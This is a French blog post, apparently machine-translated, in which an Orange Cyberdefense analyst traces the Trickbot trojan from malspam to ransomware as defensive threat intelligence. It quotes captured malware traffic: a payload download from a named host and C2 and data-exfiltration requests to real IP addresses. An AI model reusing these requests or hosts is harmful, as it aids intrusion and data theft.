{"id":163754,"date":"2022-05-24T09:08:18","date_gmt":"2022-05-24T11:08:18","guid":{"rendered":"https:\/\/teknomers.com\/fr\/analyse-des-logiciels-malveillants-trickbot\/"},"modified":"2022-05-24T09:08:30","modified_gmt":"2022-05-24T11:08:30","slug":"analyse-des-logiciels-malveillants-trickbot","status":"publish","type":"post","link":"https:\/\/teknomers.com\/fr\/analyse-des-logiciels-malveillants-trickbot\/","title":{"rendered":"Analyse des logiciels malveillants\u00a0: Trickbot"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both\"><\/div>\n<p>De nos jours, nous n&#8217;avons plus affaire \u00e0 des virus grossi\u00e8rement assembl\u00e9s, de type homebrew.  Les logiciels malveillants sont une industrie, et les d\u00e9veloppeurs professionnels se retrouvent pour \u00e9changer, que ce soit en volant son code ou en collaborant d\u00e9lib\u00e9r\u00e9ment.  Les attaques sont multicouches de nos jours, avec diverses applications logicielles sophistiqu\u00e9es prenant en charge diff\u00e9rentes t\u00e2ches tout au long de la cha\u00eene d&#8217;attaque, de la compromission initiale \u00e0 l&#8217;exfiltration ou au cryptage ultime des donn\u00e9es.  Les outils sp\u00e9cifiques \u00e0 chaque \u00e9tape sont hautement sp\u00e9cialis\u00e9s et peuvent souvent \u00eatre lou\u00e9s en tant que service, y compris le support client et les mod\u00e8les d&#8217;abonnement pour une utilisation (ab)professionnelle.  De toute \u00e9vidence, cela a largement augment\u00e9 \u00e0 la fois la disponibilit\u00e9 et l&#8217;efficacit\u00e9 et l&#8217;impact potentiels des logiciels malveillants.  \u00c7a fait peur\u00a0? <\/p>\n<p>Eh bien, c&#8217;est le cas, mais la professionnalisation apparente a aussi de bons c\u00f4t\u00e9s.  L&#8217;un des facteurs est que certains modules r\u00e9utilis\u00e9s couramment trouv\u00e9s dans les logiciels malveillants peuvent \u00eatre utilis\u00e9s pour identifier, suivre et analyser les logiciels d&#8217;attaque professionnels.  En fin de compte, cela signifie qu&#8217;avec suffisamment d&#8217;exp\u00e9rience, des analystes qualifi\u00e9s peuvent d\u00e9tecter et arr\u00eater les logiciels malveillants sur leur \u00e9lan, souvent avec peu ou pas de d\u00e9g\u00e2ts (si les attaquants franchissent les premi\u00e8res lignes de d\u00e9fense).<\/p>\n<p>Voyons ce m\u00e9canisme en action alors que nous suivons un v\u00e9ritable analyste de CyberSOC enqu\u00eatant sur le cas du malware surnomm\u00e9 &#8220;Trickbot&#8221;.<\/p>\n<h2><strong>Origines de Trickbot<\/strong><\/h2>\n<p>Les CyberSOC d&#8217;Orange Cyberdefense suivent depuis un certain temps le malware sp\u00e9cifique nomm\u00e9 Trickbot.  Il est commun\u00e9ment attribu\u00e9 \u00e0 un Threat Actor sp\u00e9cifique g\u00e9n\u00e9ralement connu sous le nom de Wizard Spider (Crowdstrike), UNC1778 (FireEye) ou Gold Blackburn (Secureworks).<\/p>\n<p>Trickbot est un cheval de Troie populaire et modulaire initialement utilis\u00e9 pour cibler le secteur bancaire, qui a \u00e9galement \u00e9t\u00e9 utilis\u00e9 pour compromettre des entreprises d&#8217;autres secteurs.  Il d\u00e9livre plusieurs types de charges utiles.  Trickbot a progressivement \u00e9volu\u00e9 pour \u00eatre utilis\u00e9 comme Malware-as-a-Service (MaaS) par diff\u00e9rents groupes d&#8217;attaque.<\/p>\n<p>L&#8217;acteur de la menace derri\u00e8re est connu pour agir rapidement, en utilisant l&#8217;outil de post-exploitation bien connu Cobalt Strike pour se d\u00e9placer lat\u00e9ralement sur l&#8217;infrastructure r\u00e9seau de l&#8217;entreprise et d\u00e9ployer des ransomwares comme Ryuk ou Conti comme \u00e9tape finale.  Comme il est utilis\u00e9 pour l&#8217;acc\u00e8s initial, \u00eatre capable de d\u00e9tecter cette menace le plus rapidement possible est un \u00e9l\u00e9ment cl\u00e9 du succ\u00e8s pour pr\u00e9venir de nouvelles attaques.<\/p>\n<p>Cette analyse des menaces se concentrera sur l&#8217;acteur mena\u00e7ant nomm\u00e9 TA551 et son utilisation de Trickbot comme exemple.  Je pr\u00e9senterai comment nous sommes en mesure d&#8217;effectuer une d\u00e9tection aux diff\u00e9rentes \u00e9tapes de la cha\u00eene de destruction, en partant de l&#8217;infection initiale par des campagnes de malspam, en passant \u00e0 la d\u00e9tection des outils utilis\u00e9s par l&#8217;acteur de la menace lors de la compromission.  Nous fournirons \u00e9galement des informations suppl\u00e9mentaires sur la fa\u00e7on dont l&#8217;auteur de la menace utilise ce malware et l&#8217;\u00e9volution qu&#8217;il a fallu.<\/p>\n<h4 style=\"text-align: left\"><strong>1 <\/strong>\u2014 <strong>Acc\u00e8s initial<\/strong><\/h4>\n<ol>\n<\/ol>\n<p>Depuis juin 2021, le groupe TA551 a commenc\u00e9 \u00e0 livrer le malware Trickbot en utilisant un zip crypt\u00e9.  L&#8217;email pr\u00e9texte imite une information importante pour diminuer la vigilance de l&#8217;utilisateur.<\/p>\n<p>La pi\u00e8ce jointe comprend un fichier .zip qui comprend \u00e0 nouveau un document.  Le fichier zip utilise toujours le m\u00eame nom que &#8220;request.zip&#8221; ou &#8220;info.zip&#8221;, et le m\u00eame nom pour le fichier du document.<\/p>\n<p><i>NB : The Threat Actor a utilis\u00e9 le m\u00eame modus operandi avant\/en parall\u00e8le \u00e0 Trickbot pour d\u00e9livrer d&#8217;autres malwares.  Nous avons observ\u00e9 durant la m\u00eame p\u00e9riode, de juin 2021 \u00e0 septembre 2021, l&#8217;utilisation de Bazarloader sur la charge utile d&#8217;acc\u00e8s initiale.<\/i><\/p>\n<h4 style=\"text-align: left\"><strong>2 <\/strong>\u2014 <strong>Ex\u00e9cution<\/strong><\/h4>\n<ol>\n<\/ol>\n<p>Lorsque l&#8217;utilisateur ouvre le document avec les macros activ\u00e9es, un fichier HTA est d\u00e9pos\u00e9 sur le syst\u00e8me et lanc\u00e9 \u00e0 l&#8217;aide de cmd.exe.  Le fichier HTA est utilis\u00e9 pour t\u00e9l\u00e9charger la DLL Trickbot \u00e0 partir d&#8217;un serveur distant.<\/p>\n<p>Ce comportement est li\u00e9 \u00e0 TA551, nous pouvons l&#8217;identifier avec le motif &#8220;\/bdfh\/&#8221; dans la requ\u00eate GET.<\/p>\n<blockquote>\n<p><i>OBTENIR \/bdfh\/M8v[..]VUb HTTP\/1.1<\/i><\/p>\n<p><i>Accepter: *\/*<\/i><\/p>\n<p><i>H\u00e9bergeur : wilkinstransportss.com<\/i><\/p>\n<p><i>Content-Type\u00a0: application\/octet-stream<\/i><\/p>\n<\/blockquote>\n<p>NB : Les motifs li\u00e9s au TA551 ont \u00e9volu\u00e9 avec le temps, depuis mi-ao\u00fbt 2021, le motif a chang\u00e9 en &#8220;\/bmdff\/&#8221;.  La DLL est enregistr\u00e9e en tant que fichier jpg pour masquer la v\u00e9ritable extension, et elle essaie d&#8217;\u00eatre ex\u00e9cut\u00e9e via regsvr32.exe.  Ensuite, Trickbot sera inject\u00e9 dans &#8220;wermgr.exe&#8221; en utilisant les techniques de Process Hollowing.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left\">\n<tbody>\n<tr>\n<td style=\"text-align: center\"><img decoding=\"async\" alt=\"\" border=\"0\" data-original-height=\"415\" data-original-width=\"728\" src=\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2022\/05\/1653390498_447_Analyse-des-logiciels-malveillants-Trickbot.jpg\" \/><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center\">Figure 1 &#8211; Ex\u00e9cution de Trickbot dans le bac \u00e0 sable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4 style=\"text-align: left\"><strong>3 <\/strong>\u2014 <strong>Le recueil<\/strong><\/h4>\n<ol>\n<\/ol>\n<p>Apr\u00e8s la compromission initiale r\u00e9ussie du syst\u00e8me, Trickbot peut collecter de nombreuses informations sur sa cible \u00e0 l&#8217;aide d&#8217;ex\u00e9cutables Windows l\u00e9gitimes et identifier si le syst\u00e8me est membre d&#8217;un domaine Active Directory. <\/p>\n<p>De plus, pour cette collection, Trickbot analysera plus d&#8217;informations comme la version de Windows, l&#8217;adresse IP publique, l&#8217;utilisateur qui ex\u00e9cute Trickbot, et aussi si le syst\u00e8me est derri\u00e8re un pare-feu NAT.<\/p>\n<p>Trickbot est \u00e9galement capable de collecter des informations sensibles comme des donn\u00e9es bancaires ou des identifiants, et de les exfiltrer vers un serveur de commande et de contr\u00f4le d\u00e9di\u00e9 (C2).<\/p>\n<h4 style=\"text-align: left\"><strong>4 <\/strong>\u2014 <strong>Commandement et contr\u00f4le<\/strong><\/h4>\n<ol>\n<\/ol>\n<p>Lorsque le syst\u00e8me est infect\u00e9, il peut contacter plusieurs types de Trickbot C2.  Le C2 principal est celui avec lequel le syst\u00e8me victime va communiquer, principalement pour obtenir de nouvelles instructions.<\/p>\n<p>Toutes les requ\u00eates adress\u00e9es \u00e0 un Trickbot C2 utilisent le format suivant\u00a0:<\/p>\n<blockquote>\n<p>&#8220;\/\/\/\/&lt;suppl\u00e9mentaire <\/p>\n<p>informations sur la commande&gt;\/&#8221;<\/p>\n<\/blockquote>\n<blockquote>\n<p><i>OBTENIR \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/0\/Windows 10 x64\/1108\/XX.XX.XX.XX\/38245433F0E3D5689F6EE84483106F4382CC920EAFAD512EAFAD<\/i><\/p>\n<p><i>6571D97A519A2EF29\/0bqjxzSOQUSLPRJMQSWKDHTHKEG\/ HTTP\/1.1<\/i><\/p>\n<p><i>Connexion\u00a0: Keep-Alive<\/i><\/p>\n<p><i>Agent utilisateur : curl\/7.74.0<\/i><\/p>\n<p><i>H\u00f4te : 202.165.47.106<\/i><\/p><\/blockquote>\n<p>Toutes les donn\u00e9es collect\u00e9es sont envoy\u00e9es \u00e0 un Exfiltration Trickbot C2 s\u00e9par\u00e9 \u00e0 l&#8217;aide des m\u00e9thodes de requ\u00eate HTTP POST.  Le format de requ\u00eate reste le m\u00eame, mais la commande &#8220;90&#8221; est sp\u00e9cifique \u00e0 l&#8217;exfiltration de donn\u00e9es, plus pr\u00e9cis\u00e9ment aux donn\u00e9es syst\u00e8me collect\u00e9es sur le syst\u00e8me infect\u00e9.<\/p>\n<blockquote>\n<p><i>POSTE \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/90\/ HTTP\/1.1<\/i><\/p>\n<p><i>Connexion\u00a0: Keep-Alive<\/i><\/p>\n<p><i>Type de contenu\u00a0: multipart\/form-data\u00a0;  fronti\u00e8re=&#8212;&#8212;Li\u00e9<\/i><\/p>\n<p><i>ary0F79C562<\/i><\/p>\n<p><i>Agent utilisateur\u00a0: Ghost<\/i><\/p>\n<p><i>H\u00f4te : 24.242.237.172:443<\/i><\/p>\n<\/blockquote>\n<h2><strong>Attaques de suivi\u00a0: Cobalt Strike, Ryuk, Conti<\/strong><\/h2>\n<p>Frappe de cobalt[1] est un outil d&#8217;acc\u00e8s \u00e0 distance commercial, complet et qui s&#8217;appelle un &#8220;logiciel de simulation d&#8217;adversaire con\u00e7u pour ex\u00e9cuter des attaques cibl\u00e9es et \u00e9muler les actions post-exploitation d&#8217;acteurs de menace avanc\u00e9s&#8221;.  Les capacit\u00e9s post-exploit interactives de Cobalt Strike couvrent toute la gamme des tactiques ATT&amp;CK, toutes ex\u00e9cut\u00e9es dans un seul syst\u00e8me int\u00e9gr\u00e9.<\/p>\n<p>Dans notre contexte, Trickbot utilise le processus d\u00e9tourn\u00e9 wermgr.exe pour charger une balise Cobalt Strike en m\u00e9moire.<\/p>\n<p>Plusieurs op\u00e9rateurs de ran\u00e7ongiciels sont \u00e9galement affili\u00e9s aux acteurs de la menace.  Le but de Trickbot est d&#8217;effectuer l&#8217;acc\u00e8s initial pr\u00e9c\u00e9dant l&#8217;attaque r\u00e9elle du ransomware.  Conti et Ryuk sont les principaux ransomwares observ\u00e9s au stade final des infections Trickbot, mais de loin pas les seuls.  Conti est un groupe qui exploite un mod\u00e8le Ransomware-as-a-Service et est disponible pour plusieurs acteurs de menace affili\u00e9s.  Ryuk, d&#8217;autre part, est un ran\u00e7ongiciel qui est directement li\u00e9 \u00e0 l&#8217;acteur mena\u00e7ant derri\u00e8re Trickbot.<\/p>\n<h2><strong>Principaux enseignements<\/strong><\/h2>\n<p>Les auteurs de menaces utilisent encore souvent des techniques de base pour acc\u00e9der au r\u00e9seau, comme les e-mails de phishing.  Sensibiliser au phishing est certainement une premi\u00e8re \u00e9tape importante dans le renforcement de la cyber-r\u00e9silience.  Les meilleures attaques sont, apr\u00e8s tout, celles qui ne commencent m\u00eame jamais.<\/p>\n<p>Bien s\u00fbr, il n&#8217;existe pas de protection pr\u00e9ventive \u00e0 l&#8217;\u00e9preuve des balles dans le cyber.  Il est d&#8217;autant plus important d&#8217;avoir la capacit\u00e9 de d\u00e9tecter Trickbot \u00e0 un stade pr\u00e9coce.  Bien que la cha\u00eene d&#8217;attaque puisse \u00eatre interrompue \u00e0 chaque \u00e9tape du processus : plus elle est tardive, plus le risque de compromission totale et les dommages qui en r\u00e9sultent sont \u00e9lev\u00e9s.  Trickbot est utilis\u00e9 par diff\u00e9rents acteurs de la menace, mais l&#8217;approche de d\u00e9tection reste la m\u00eame sur la plupart de ses \u00e9tapes sp\u00e9cifiques.  Certains des indicateurs de compromis sont expliqu\u00e9s ici.  Mais les logiciels malveillants re\u00e7oivent \u00e9galement des mises \u00e0 jour. <\/p>\n<p>Les analystes doivent rester vigilants.  Le suivi et la surveillance d&#8217;un logiciel malveillant sp\u00e9cifique ou d&#8217;un acteur mena\u00e7ant est essentiel pour suivre son \u00e9volution, son am\u00e9lioration et se tenir au courant d&#8217;une d\u00e9tection efficace de la menace.<\/p>\n<p>Ceci est une histoire des tranch\u00e9es trouv\u00e9es dans le <a rel=\"nofollow noopener\" href=\"https:\/\/orangecyberdefense.com\/global\/security-navigator\/\" target=\"_blank\">Navigateur de s\u00e9curit\u00e9<\/a>.  Vous y trouverez \u00e9galement d&#8217;autres analyses de logiciels malveillants et d&#8217;autres \u00e9l\u00e9ments int\u00e9ressants, notamment des comptes rendus d&#8217;op\u00e9rations d&#8217;intervention d&#8217;urgence et le point de vue d&#8217;un scientifique criminel sur la cyber-extorsion, ainsi que des tonnes de faits et de chiffres sur le paysage de la s\u00e9curit\u00e9 en g\u00e9n\u00e9ral.  Le rapport complet est disponible en t\u00e9l\u00e9chargement sur le site Orange Cyberdefense, alors n&#8217;h\u00e9sitez pas \u00e0 le consulter.  \u00c7a en vaut la peine!<\/p>\n<p><i>[1]  MITRE ATT&amp;CK Frappe Cobalt : <a rel=\"nofollow noopener\" href=\"https:\/\/attack.mitre.org\/software\/S0154\/\" target=\"_blank\">https:\/\/attack.mitre.org\/software\/S0154\/<\/a><\/i><\/p>\n<p><i>Cet article a \u00e9t\u00e9 r\u00e9dig\u00e9 par <strong>Florian Goutin<\/strong>analyste CyberSOC chez Orange Cyberdefense.<\/i><\/p>\n<p><\/p>\n<\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/thehackernews.com\/2022\/05\/malware-analysis-trickbot.html\" rel=\"nofollow noopener\" target=\"_blank\">ttn-fr-57<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>De nos jours, nous n&#8217;avons plus affaire \u00e0 des virus grossi\u00e8rement assembl\u00e9s, de type homebrew. Les logiciels malveillants sont une industrie, et les d\u00e9veloppeurs professionnels se retrouvent pour \u00e9changer, que ce soit en volant son code ou en collaborant d\u00e9lib\u00e9r\u00e9ment. Les attaques sont multicouches de nos jours, avec diverses applications logicielles sophistiqu\u00e9es prenant en charge [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":163755,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[1342,4168,4158,4165,4161,133,4157,4159,4171,4170,4167,4589,4590,4160,4163,4162,4172,4169,4583,4166,4164],"class_list":["post-163754","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technologie","tag-analyse","tag-comment-pirater","tag-cyber-actualites","tag-cyber-attaques","tag-cyber-mises-a-jour","tag-des","tag-lactualite-de-la-cybersecurite","tag-lactualite-de-la-cybersecurite-aujourdhui","tag-lactualite-des-hackers","tag-la-securite-des-informations","tag-logiciel-malveillant-de-ransomware","tag-logiciels","tag-malveillants","tag-mises-a-jour-de-la-cybersecurite","tag-nouvelles-de-piratage","tag-nouvelles-de-pirates","tag-securite-informatique","tag-securite-internet","tag-trickbot","tag-violation-de-donnees","tag-vulnerabilite-logicielle"],"_links":{"self":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts\/163754","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/comments?post=163754"}],"version-history":[{"count":0,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/posts\/163754\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/media\/163755"}],"wp:attachment":[{"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/media?parent=163754"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/categories?post=163754"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/teknomers.com\/fr\/wp-json\/wp\/v2\/tags?post=163754"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}